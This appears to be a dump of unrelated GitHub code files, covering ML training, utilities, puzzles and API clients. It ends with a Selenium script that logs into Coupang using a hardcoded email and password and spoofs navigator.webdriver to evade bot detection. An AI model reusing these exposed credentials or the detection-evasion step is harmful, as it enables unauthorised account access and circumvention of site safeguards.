F.relu(x)\n # x = F.dropout(x, training=self.training)\n x = self.conv2(x, edge_index)\n \n return F.log_softmax(x, dim=1)\n\n#%% train\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nmodel = Net()\nmodel.train() # training phase\n# input data\ndata = dataset[0]\n \n# optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n \n# learnig loop\nfor epoch in range(100):\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out, data.y)\n loss.backward()\n optimizer.step()\n print('Epoch %d | Loss: %.4f' % (epoch, loss.item()))\n\nmodel.eval() # evaluation phase\n_, pred = model(data).max(dim=1)\n\nprint(\"Results: \", pred)\nprint(\"True: \", data[\"y\"])","repo_name":"mizuno-group/TopoPathology","sub_path":"dev/gnn/karate_dev.py","file_name":"karate_dev.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3964751507","text":"import paddle\nfrom paddle import nn\n\nfrom .mobile_bert_self_att import MobileBertSelfAttention\nfrom .mobile_bert_self_out import MobileBertSelfOutput\n\nfrom typing import List, Tuple, Set\n\n\nclass MobileBertAttention(nn.Layer):\n def __init__(self, config):\n super().__init__()\n self.self = MobileBertSelfAttention(config)\n self.output = MobileBertSelfOutput(config)\n self.pruned_heads = set()\n\n def prune_heads(self, heads):\n if len(heads) == 0:\n return\n heads, index = find_pruneable_heads_and_indices(\n heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads\n )\n\n # Prune linear layers\n self.self.query = prune_linear_layer(self.self.query, index)\n self.self.key = prune_linear_layer(self.self.key, index)\n self.self.value = prune_linear_layer(self.self.value, index)\n self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)\n\n # Update hyper params and store pruned heads\n self.self.num_attention_heads = self.self.num_attention_heads - len(heads)\n self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads\n self.pruned_heads = self.pruned_heads.union(heads)\n\n def forward(\n self,\n query_tensor,\n key_tensor,\n value_tensor,\n layer_input,\n attention_mask=None,\n head_mask=None,\n output_attentions=None,\n ):\n self_outputs = self.self(\n query_tensor,\n key_tensor,\n value_tensor,\n attention_mask,\n head_mask,\n output_attentions,\n )\n # Run a linear projection of `hidden_size` then add a residual\n # with `layer_input`.\n attention_output = self.output(self_outputs[0], layer_input)\n outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them\n return outputs\n\n\ndef prune_linear_layer(layer: nn.Linear, index, dim: int = 0) -> nn.Linear:\n \"\"\"\n Prune a linear layer to keep only entries in index.\n\n Used to remove heads.\n\n Args:\n layer (:obj:`torch.nn.Linear`): The layer to prune.\n index (:obj:`torch.LongTensor`): The indices to keep in the layer.\n dim (:obj:`int`, `optional`, defaults to 0): The dimension on which to keep the indices.\n\n Returns:\n :obj:`torch.nn.Linear`: The pruned layer as a new layer with :obj:`requires_grad=True`.\n \"\"\"\n index = index.to(layer.weight.device)\n W = layer.weight.index_select(dim, index).clone().detach()\n if layer.bias is not None:\n if dim == 1:\n b = layer.bias.clone().detach()\n else:\n b = layer.bias[index].clone().detach()\n new_size = list(layer.weight.shape)\n new_size[dim] = len(index)\n new_layer = nn.Linear(new_size[1], new_size[0], bias_attr=layer.bias is not None)\n new_layer.weight.requires_grad = False\n new_layer.weight.copy_(W.contiguous())\n new_layer.weight.requires_grad = True\n if layer.bias is not None:\n new_layer.bias.requires_grad = False\n new_layer.bias.copy_(b.contiguous())\n new_layer.bias.requires_grad = True\n return new_layer\n\n\ndef find_pruneable_heads_and_indices(\n heads: List[int], n_heads: int, head_size: int, already_pruned_heads: Set[int]\n) -> Tuple[Set[int], paddle.Tensor]:\n \"\"\"\n Finds the heads and their indices taking :obj:`already_pruned_heads` into account.\n\n Args:\n heads (:obj:`List[int]`): List of the indices of heads to prune.\n n_heads (:obj:`int`): The number of heads in the model.\n head_size (:obj:`int`): The size of each head.\n already_pruned_heads (:obj:`Set[int]`): A set of already pruned heads.\n\n Returns:\n :obj:`Tuple[Set[int], torch.LongTensor]`: A tuple with the remaining heads and their corresponding indices.\n \"\"\"\n mask = paddle.ones((n_heads, head_size))\n heads = set(heads) - already_pruned_heads # Convert to set and remove already pruned heads\n for head in heads:\n # Compute how many pruned heads are before the head and move the index accordingly\n head = head - sum(1 if h < head else 0 for h in already_pruned_heads)\n mask[head] = 0\n mask = mask.reshape(-1) == 1\n index = paddle.masked_select(mask, paddle.arange(len(mask)))\n return heads, index\n","repo_name":"zhengtongopu/MobileBERT-paddle","sub_path":"mobilebert_paddle/mobile_bert_att.py","file_name":"mobile_bert_att.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40936536526","text":"import sys\nsys.path.insert(0, '.')\nfrom tools import log\n\n\ndef to_num(str):\n return int(str.replace(\"\\n\", \"\"))\n\n@log\ndef get_largernums(data):\n last_number = to_num(data[0]) + to_num(data[1]) +to_num(data[2])\n lager_numbers = 0\n\n\n for iter in range(2, len(data)-2):\n number = to_num(data[iter]) + to_num(data[iter + 1]) +to_num(data[iter + 2])\n\n if number > last_number:\n lager_numbers += 1\n\n last_number = number\n\n return lager_numbers\n\n\ndata1 = open(\"./Day 1/data1\", \"r\").readlines()\ndata2 = open(\"./Day 1/data2\", \"r\").readlines()\n\nget_largernums(data1)\nget_largernums(data2)","repo_name":"mightytry/AdventOfCode","sub_path":"Adventofcode 2021/Day 1/sonar.py","file_name":"sonar.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38488698461","text":"import pygame as pg\n\n# Initialiserer Pygame\npygame.init()\n\n# Oppretter vinduet\nscreen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n\n# Setter tittelen på vinduet\npygame.display.set_caption(\"Bouncing Ball\")\n\n# Angir hvilken skrifttype og tekststørrelse vi vil bruke på tekst\nfont = pygame.font.SysFont(\"Arial\", 50)\n\nWHITE = (255, 255, 255)\nBLACK = (0,0,0)","repo_name":"akselwe/akselwe.github.io","sub_path":"gitGames/jumpingGame/jumping.py","file_name":"jumping.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39586979730","text":"import requests\nimport json\nimport os\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\napi_key = os.getenv('api_key')\n\n\nresponse = requests.get(\"https://newsapi.org/v2/top-headlines?country=us&category=technology&apiKey={}\".format(api_key))\n\n#print(response.title)\n\njson_object = json.loads(response.content)\n\n# json_data = response.json()\narticles = json_object[\"articles\"]\n\narticles_dict = []\n\nfor element in articles:\n title = str(element.get('title'))\n published = str(element.get('publishedAt'))\n author = str(element.get('author'))\n description = str(element.get('description'))\n url_for_article = str(element.get('url'))\n content = str(element.get('content'))\n\n element = '''**Title:** {}\\n**Date Published:** {}\\n**Author:** {}\\n**Description**: {}\\n\\n{}\\n\\n{}\\n\n '''.format(title, published, author, description, content, url_for_article)\n\n articles_dict.append(element)\n\narticles = articles_dict[6]\n\n# print(articles)\n","repo_name":"Fiscoon/great_sage_of_forbidden_knowledge","sub_path":"news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30306678789","text":"'''Demonstrate a read-only attribute.\n\nSets an attribute to read-only using the @property decorator. See the following\nfor more information: http://go/pylib/functions.html#property\n'''\nclass Parrot(object):\n def __init__(self):\n self._voltage = 100000\n\n @property\n def voltage(self):\n \"\"\"Get the current voltage.\"\"\"\n return self._voltage\n\np = Parrot()\np.voltage\n''' Setting the voltage should result in:\nTraceback (most recent call last):\n File \"property.py\", line 12, in \n p.voltage = 2\nAttributeError: can't set attribute\n\n'''\np.voltage = 2\np.voltage\n","repo_name":"the-hobbes/misc","sub_path":"property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"71480253879","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nimport os\nimport argparse\nimport itertools\nimport torch\nimport torch.nn as nn\n\nimport numpy as np\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom advertorch.attacks import LinfPGDAttack\n\nimport vgg\nfrom vgg import VGG\n\n# set whether to use GPU\ntorch.manual_seed(0)\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\n\n####################################\n# model dir\n####################################\nif use_cuda:\n MODEL = \"model.pkl\"\nelse:\n MODEL = \"model.pkl\"\n\n####################################\n# load model\n####################################\nif os.path.isfile(MODEL):\n print(\"=> loading model '{}'\".format(MODEL))\n if use_cuda:\n model = torch.load(MODEL)['net']\n model.to(device)\n else:\n model = torch.load(MODEL, map_location=device)['net']\n print('model loaded')\nelse:\n print(\"=> no checkpoint found at '{}'\".format(MODEL))\n\n####################################\n# load data\n####################################\nbatch_size = 5\n\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True,\n download=True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size,\n shuffle=True, num_workers=0)\n\ntestset = torchvision.datasets.CIFAR10(root='./data', train=False,\n download=True, transform=transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=batch_size,\n shuffle=False, num_workers=0)\n\nclasses = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n####################################\n# Test acc on training dataset\n####################################\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. for i in range(10))\n\nwith torch.no_grad():\n for data in trainloader:\n images, labels = data[0].to(device), data[1].to(device)\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n c = (predicted == labels).squeeze()\n for i in range(batch_size):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\nfor i in range(10):\n print('Training accuracy of %5s : %2d %%' % (\n classes[i], 100 * class_correct[i] / class_total[i]))\n\n\n\n####################################\n# Test acc on testing dataset\n####################################\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. for i in range(10))\n\nwith torch.no_grad():\n for data in testloader:\n images, labels = data[0].to(device), data[1].to(device)\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n c = (predicted == labels).squeeze()\n for i in range(batch_size):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\nfor i in range(10):\n print('Testing accuracy of %5s : %2d %%' % (\n classes[i], 100 * class_correct[i] / class_total[i]))\n","repo_name":"zifanw/frequency_explain","sub_path":"vgg_attack_CIFAR/vgg_acc.py","file_name":"vgg_acc.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6161795712","text":"import csv\r\nimport os\r\nimport shutil\r\nfrom pydub import AudioSegment\r\n\r\nfolders = ['regular', 'slow', 'fast', 'dirty']\r\nmaxNumber = 1500\r\n\r\nlst = os.listdir('backVoice')\r\ni=0\r\ndef dirty(file1):\r\n newName = f'D:/dirty/{file1[-17:]}'\r\n global i\r\n sound1 = AudioSegment.from_wav(file1)\r\n sound2 = AudioSegment.from_wav(f'backVoice/{lst[i%len(lst)]}')\r\n # mix sound2 with sound1, starting at 5000ms into sound1)\r\n output = sound1.overlay(sound2, position=0)\r\n # save the result\r\n output.export(newName, format=\"wav\")\r\n i+=1\r\n return newName\r\ndef speed(name, speed):\r\n newName = ''\r\n if speed == 'fast':\r\n newName = f'D:/fast/{name[-17:]}'\r\n os.system(f'ffmpeg -i {name} -af \"atempo=2\" {newName}')\r\n else:\r\n newName = f'D:/slow/{name[-17:]}'\r\n os.system(f'ffmpeg -i {name} -af \"atempo=0.5\" {newName}')\r\n return newName\r\ndef creat(name, index):\r\n if folders[index%len(folders)] == 'regular':\r\n newName = f'D:/regular/{couple[0][-17:]}'\r\n shutil.copyfile(name,newName)\r\n return newName\r\n elif folders[index%len(folders)] == 'dirty':\r\n return dirty(name)\r\n else:\r\n return speed(name, folders[index%len(folders)])\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n newData = []\r\n genderCount = {'male': 0, 'female':0}\r\n with open('balanced-all.csv' ,'r', newline='') as csvfile:\r\n reader = csv.reader(csvfile)\r\n next(reader,None)\r\n for couple in reader:\r\n # print(couple)\r\n # print(couple[0][-17:])\r\n print(f'male: {genderCount[\"male\"]}')\r\n print(f'female: {genderCount[\"female\"]}')\r\n if genderCount['male'] == 3400 and genderCount['female'] == 3400: \r\n break\r\n if genderCount[couple[1]] >= 3400:\r\n continue\r\n if genderCount[couple[1]] <= 1500:\r\n newName = creat(couple[0], genderCount[couple[1]])\r\n else:\r\n newName = creat(couple[0], 0)\r\n newData.append([newName , couple[1]])\r\n genderCount[couple[1]]+=1\r\n\r\n with open('new_balanced-all.csv' ,'a', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerows(newData)","repo_name":"dvirGev/gender-recognition-by-voice","sub_path":"makeNewDataBase.py","file_name":"makeNewDataBase.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24330620455","text":"def permute(nums):\n # define a helper function for backtracking\n def dfs(ind):\n # base case: add the current permutation to the result\n if ind == len(nums):\n result.append(nums[:])\n # recursive case: swap each element with the first element, then recurse\n for i in range(ind, len(nums)):\n nums[ind], nums[i] = nums[i], nums[ind]\n dfs(ind + 1)\n nums[ind], nums[i] = nums[i], nums[ind]\n\n result = []\n dfs(0)\n return result\n\nn = ['a','b','c']\n# subsets are different that permuations \n# subsets can be empty\n# permtuations must be equal in length to the input \n# permtuations are N!\n# subsets are 2^N * N at best! \n# _ first postion can choose 3 values \n# _ _ second position can choose 2 values\n# _ _ _ third position can choose only 1 value left \n# 3*2*1 \n# N * (N-1) .... * 1 = N! \n'''\nThe main difference is that there is not the length condition, \n(remember that a subset/combination can be empty and/or have less elements than the input set\n- whereas a permutation must be equal in length to the input).\n\nPermutation - is a rearrangement of elements \nabc \nacb \nbac\nbca\ncab\ncba\nElements ! \nN ! \n'''\nprint(permute(n))\n\nclass Solution:\n def permutations(self,nums:list[int])->list[list[int]]:\n result = [] \n if len(nums) == 1:\n return [nums[:]]\n \n for _ in range(len(nums)):\n n = nums.pop(0) \n perms = self.permutations(nums)\n for perm in perms:\n perm.append(n)\n result.extend(perms)\n nums.append(n)\n \n return result \n \nsolve = Solution()\nn1 = [1,2,3]\nx = solve.permutations(n1)\n\n\ndef generatePermutations(nums):\n answers = []\n\n permutation = []\n used = set()\n\n def backtrack():\n if (len(permutation) == len(nums)):\n answers.append(permutation.copy())\n return\n #[1, 2, 3]\n # N * (N * N-1 ...1 )= N*N!\n # depth = N \n for i in range(len(nums)):\n if i not in used:\n used.add(i)\n permutation.append(nums[i])\n backtrack()\n used.remove(i) # 2 \n permutation.pop() # nums[2] == 3 \n\n backtrack()\n return answers","repo_name":"jonathanyulan99/SDE-Fundamentals","sub_path":"ALL/Formation/Algo Workout/Intermediate Recursion/algo_pair_session_may_7.py","file_name":"algo_pair_session_may_7.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21599288758","text":"from time import sleep\nv1 = int(input('Primeiro valor: '))\nv2 = int(input('Segundo valor: '))\nopção = 0\nmaior = 0\nwhile opção != 5:\n opção = int(input(''' [1] Somar\n [2] Multiplicar\n [3] Maior\n [4] Novos números\n [5] Sair do programa\n>>>> Qual é sua opção? '''))\n\n if opção == 1:\n print('A soma entre {} + {} = {}'.format(v1, v2, v1+v2))\n elif opção == 2:\n print('O resultado de {} x {} é {}'.format(v1, v2, v1*v2))\n elif opção == 3:\n if v1 > v2:\n maior = v1\n elif v2 > v1:\n maior = v2\n else:\n print('São iguais.')\n print('Entre {} e {} o maior valor é {}'.format(v1, v2, maior))\n elif opção == 4:\n print('Informe os números novamente:')\n v1 = int(input('Primeiro valor: '))\n v2 = int(input('Segundo valor: '))\n elif opção == 5:\n print('Finalizando...')\n sleep(2)\n else:\n print('Opção inválida. Tente novamente!')\n print('=-=' * 15)\n\nprint('Fim do programa! Volte sempre!')","repo_name":"Lucas-ns/Python-3-Curso-Em-Video","sub_path":"PythonExercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26803556284","text":"import os\r\nimport shutil\r\n\r\n\r\nprint(\"Test mod kuler by Rubrik25\")\r\nprint(\"Version V 1.5\")\r\n\r\nmmd = open(\"MMD.txt\", \"r\")\r\nmmdr = mmd.read()\r\nprint(mmdr)\r\n\r\nconf = open(\"Conf.txt\", \"r\")\r\nconfr = conf.read()\r\nprint(confr)\r\n\r\ntry:\r\n os.mkdir(\"mods\")\r\n os.chdir(\"mods\")\r\nexcept:\r\n os.chdir(\"mods\")\r\n\r\nif confr == \"ru\":\r\n for dirpath, dirnames, filenames in os.walk(\".\"):\r\n for dirname in dirnames:\r\n print(\"Папка:\", os.path.join(dirpath, dirname))\r\n \r\n for filename in filenames:\r\n print(\"Мод:\", os.path.join(dirpath, filename))\r\n while(True):\r\n try:\r\n jq = input(\"Который мод тебе нужно установить: \")\r\n jqc = jq[2:]\r\n print(jqc)\r\n shutil.copy(os.getcwd()+ \"\\\\\" + jqc, mmdr)\r\n except:\r\n print(\"Проблема..\")\r\nif confr == \"en\":\r\n for dirpath, dirnames, filenames in os.walk(\".\"):\r\n \r\n for dirname in dirnames:\r\n print(\"Folder:\", os.path.join(dirpath, dirname))\r\n \r\n for filename in filenames:\r\n print(\"Mod:\", os.path.join(dirpath, filename))\r\n while(True):\r\n try:\r\n jq = input(\"Wich mod you need to install: \")\r\n print(jq)\r\n jqc = jq[2:]\r\n print(jqc)\r\n shutil.copy(os.getcwd()+ \"\\\\\" + jqc, mmdr)\r\n except:\r\n print(\"Problem..\")\r\n","repo_name":"Rubrik25/ModCoolerForMinecraft","sub_path":"MOD COOLER V 1.5/Start.py","file_name":"Start.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27298847312","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def buildTree(self, preorder, inorder):\n \"\"\"\n :type preorder: List[int]\n :type inorder: List[int]\n :rtype: TreeNode\n \"\"\"\n def dfs(preorder, inorder):\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n # print (preorder, inorder)\n mid = inorder.index(preorder[0])\n \n root.left = dfs(preorder[1:mid+1], inorder[:mid])\n root.right = dfs(preorder[mid+1:], inorder[mid+1:])\n return root\n return dfs(preorder, inorder)","repo_name":"larui529/LeetCode","sub_path":"Tree/105. 从前序与中序遍历序列构造二叉树/105.py","file_name":"105.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13033594386","text":"\ndef get_n_value():\n try:\n n = int(input(\"Please enter the first number (N): \"))\n except ValueError:\n print(\"Entered sign is not an integer. Try again\")\n return n\n\n\ndef get_m_value():\n try:\n m = int(input(\"Please enter the second number (M) which is > than first one: \"))\n except ValueError:\n print(\"Entered sign is not an integer. Try again\")\n return m\n\n\ndef validate_input_numbers(n, m):\n \"Input numbers must follow condition: 1 <= n < m <=10000\"\n flag = True\n if n >= m:\n flag = False\n print(\"Provided numbers did not follow condition: n < m \")\n\n if n < 1:\n flag = False\n print(\"Provided first number is lower than 1.\")\n\n if m > 10000:\n flag = False\n print(\"Provided second number is greater than 10000.\")\n\n return flag\n\n\ndef print_integers(n, m):\n ordered_output = []\n for i in range(n, m+1):\n if i % 15 == 0:\n i = \"FizzBuzz\"\n elif i % 3 == 0:\n i = \"Fizz\"\n elif i % 5 == 0:\n i = \"Buzz\"\n else:\n i = str(i)\n ordered_output.append(i)\n\n for x in ordered_output:\n print(x)\n\n\nif __name__ == \"__main__\":\n flag = False\n while flag == False:\n n = get_n_value()\n m = get_m_value()\n flag = validate_input_numbers(n, m)\n print_integers(n, m)\n","repo_name":"miwiana/python_excersises","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74785385719","text":"from matplotlib import animation\nimport matplotlib.pyplot as plt\n\ndef display_save(frames, episode):\n\n plt.figure(figsize=(frames[0].shape[1]/72.0, frames[0].shape[0]/72.0),\n dpi=72)\n patch = plt.imshow(frames[0])\n plt.axis('off')\n\n def animate(i):\n patch.set_data(frames[i])\n\n anim = animation.FuncAnimation(plt.gcf(), animate, frames=len(frames),\n interval=50)\n\n anim.save('movie_snake-v0_DQN_'+str(episode)+'.mp4')","repo_name":"dkdkdkdkd/puckworld","sub_path":"display_save.py","file_name":"display_save.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19597113606","text":"from typing import Dict, List\nfrom models.pydantic_models import CarRead\n\n\ndef get_car_prices(cars: List[CarRead]) -> Dict[str, List[int]]:\n price_buckets = {\n \"under_20k\": [],\n \"20_30k\": [],\n \"30_40k\": [],\n \"40_50k\": [],\n \"50_60k\": [],\n \"60_80k\": [],\n \"80_100k\": [],\n \"100_130k\": [],\n \"130_180k\": [],\n \"180_220k\": [],\n \"over_220k\": [],\n }\n\n for car in cars:\n if car.current_price is None:\n continue\n\n if car.current_price < 20000:\n price_buckets[\"under_20k\"].append(car.id)\n elif 20000 <= car.current_price < 30000:\n price_buckets[\"20_30k\"].append(car.id)\n elif 30000 <= car.current_price < 40000:\n price_buckets[\"30_40k\"].append(car.id)\n elif 40000 <= car.current_price < 50000:\n price_buckets[\"40_50k\"].append(car.id)\n elif 50000 <= car.current_price < 60000:\n price_buckets[\"50_60k\"].append(car.id)\n elif 60000 <= car.current_price < 80000:\n price_buckets[\"60_80k\"].append(car.id)\n elif 80000 <= car.current_price < 100000:\n price_buckets[\"80_100k\"].append(car.id)\n elif 100000 <= car.current_price < 130000:\n price_buckets[\"100_130k\"].append(car.id)\n elif 130000 <= car.current_price < 180000:\n price_buckets[\"130_180k\"].append(car.id)\n elif 180000 <= car.current_price < 220000:\n price_buckets[\"180_220k\"].append(car.id)\n\n # Over 220k\n elif car.current_price > 220000:\n price_buckets[\"over_220k\"].append(car.id)\n\n return price_buckets\n\n\ndef get_acceleration(cars: List[CarRead]) -> Dict[str, List[int]]:\n acceleration_buckets = {\n \"under_2s\": [],\n \"2_3s\": [],\n \"3_4s\": [],\n \"4_5s\": [],\n \"6_8s\": [],\n \"8_10s\": [],\n \"over_10s\": [],\n }\n\n for car in cars:\n if car.acceleration_0_60 is None:\n continue\n\n if car.acceleration_0_60 < 2:\n acceleration_buckets[\"under_2s\"].append(car.id)\n elif 2 <= car.acceleration_0_60 < 3:\n acceleration_buckets[\"2_3s\"].append(car.id)\n elif 3 <= car.acceleration_0_60 < 4:\n acceleration_buckets[\"3_4s\"].append(car.id)\n elif 4 <= car.acceleration_0_60 < 5:\n acceleration_buckets[\"4_5s\"].append(car.id)\n elif 6 <= car.acceleration_0_60 < 8:\n acceleration_buckets[\"6_8s\"].append(car.id)\n elif 8 <= car.acceleration_0_60 < 10:\n acceleration_buckets[\"8_10s\"].append(car.id)\n elif car.acceleration_0_60 >= 10:\n acceleration_buckets[\"over_10s\"].append(car.id)\n\n return acceleration_buckets\n\n\ndef get_top_speed(cars: List[CarRead]) -> Dict[str, List[int]]:\n top_speed_buckets = {\n \"under_100\": [],\n \"100_120\": [],\n \"120_150\": [],\n \"150_180\": [],\n \"180_200\": [],\n \"over_200\": [],\n }\n\n for car in cars:\n if car.top_speed is None:\n continue\n\n if car.top_speed < 100:\n top_speed_buckets[\"under_100\"].append(car.id)\n elif 100 <= car.top_speed < 120:\n top_speed_buckets[\"100_120\"].append(car.id)\n elif 120 <= car.top_speed < 150:\n top_speed_buckets[\"120_150\"].append(car.id)\n elif 150 <= car.top_speed < 180:\n top_speed_buckets[\"150_180\"].append(car.id)\n elif 180 <= car.top_speed < 200:\n top_speed_buckets[\"180_200\"].append(car.id)\n elif car.top_speed >= 200:\n top_speed_buckets[\"over_200\"].append(car.id)\n\n return top_speed_buckets\n\n\ndef bucket_cars_by_attributes(cars: List[CarRead]) -> Dict[str, Dict[str, List[int]]]:\n price_buckets = get_car_prices(cars)\n acceleration_buckets = get_acceleration(cars)\n top_speed_buckets = get_top_speed(cars)\n car_features = {\n \"prices\": price_buckets,\n \"acceleration\": acceleration_buckets,\n \"top_speed\": top_speed_buckets,\n # ... Other feature buckets ...\n }\n return car_features\n","repo_name":"jpwilson/ev_backend","sub_path":"services/car_features.py","file_name":"car_features.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20816162353","text":"\nimport collections\nfrom typing import List,Optional\nimport copy\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n stack=[]\n for token in tokens:\n if token==\"+\" or token==\"-\" or token==\"*\" or token==\"/\":\n val2=stack.pop()\n val1=stack.pop()\n newval=0\n if token=='+':\n newval=val1+val2\n elif token=='-':\n newval=val1-val2\n elif token=='*':\n newval=val1*val2\n elif token=='/':\n rev=False\n if val1<0:\n val1=-val1\n rev=not rev\n if val2<0:\n val2=-val2\n rev=not rev\n newval=val1//val2\n if rev:\n newval=-newval\n stack.append(newval)\n else:\n stack.append(int(token))\n return stack[0]\n\nsol=Solution()\ntokens = [\"2\",\"1\",\"+\",\"3\",\"*\"]\ntokens1=[\"10\",\"6\",\"9\",\"3\",\"+\",\"-11\",\"*\",\"/\",\"*\",\"17\",\"+\",\"5\",\"+\"]\nprint(sol.evalRPN(tokens1))\n\n\n# 输入:tokens = [\"2\",\"1\",\"+\",\"3\",\"*\"]\n# 输出:9\n# 解释:该算式转化为常见的中缀算术表达式为:((2 + 1) * 3) = 9\n","repo_name":"Reigo666/Leetcode","sub_path":"Reigo/leetcode/Python/150. 逆波兰表达式求值.py","file_name":"150. 逆波兰表达式求值.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32126305167","text":"\"\"\"\nProblem: https://codeforces.com/problemset/problem/546/A\n\"\"\"\n\ndef solve():\n # Take input\n k,n,w = map(int, input().split())\n\n # he needed following money for buying\n # 1k + 2k + 3k .... wk = k * w * (w+1) / 2\n needed = int(k * w * (w + 1) / 2)\n\n # if needed is greater than he has, print (needed - n) else print n\n print(0 if needed < n else (needed - n))\n\nif __name__ == '__main__':\n solve()","repo_name":"love1024/codeforces-journery","sub_path":"17 - 546A - Soldier and Bananas.py","file_name":"17 - 546A - Soldier and Bananas.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37894232676","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# Chrome 웹 드라이버 경로 설정 (본인의 환경에 맞게 수정)\n\n\n# Chrome 웹 드라이버 생성\ndriver = webdriver.Chrome()\n\ndriver.execute_cdp_cmd(\n \"Page.addScriptToEvaluateOnNewDocument\",\n {\n \"source\": \"\"\" Object.defineProperty(navigator, 'webdriver', { get: () => undefined }) \"\"\"\n },\n)\n\nurl = \"https://login.coupang.com/login/login.pang?rtnUrl=https%3A%2F%2Fmc.coupang.com%2Fssr%2Fdesktop%2Forder%2Flist\"\n\n# url 로딩\ndriver.get(url)\n\n# 로그인 정보input\ndriver_id = driver.find_element(By.ID, \"login-email-input\")\ndriver_id.send_keys(\"kim4989d@naver.com\") # 문자열 형식으로 아이디 입력\n\ndriver_pw = driver.find_element(By.ID, \"login-password-input\")\ndriver_pw.send_keys(\"kim21541\") # 문자열 형식으로 비밀번호 입력\n\n# 로그인 버튼 클릭\n\n\n# login = driver.find_element(By.CLASS_NAME,'login__button login__button--submit _loginSubmitButton login__button--submit-rds')\n\n\nlogin = driver.find_element(\n By.XPATH,\n \"//button[@class='login__button login__button--submit _loginSubmitButton login__button--submit-rds']\",\n)\n# print('print ',login)\n# login = driver.find_elements_by_xpath(\"//button[@class='login__button login__button--submit _loginSubmitButton login__button--submit-rds']\")\nlogin.click()\n\n# 로그인 후 페이지 로딩 대기 (적절한 방법으로 변경 가능)\n# driver.implicitly_wait(10)\n\n\n# 검색 입력란과 같은 특정 요소를 대기하기 위해 명시적 대기 사용\nwait = WebDriverWait(driver, 10)\nwait.until(EC.presence_of_element_located((By.ID, 'headerSearchKeyword')))\n\n# for _ in range(2): # 스크롤을 5번 내립니다. 필요에 따라 조정 가능\n# driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n# 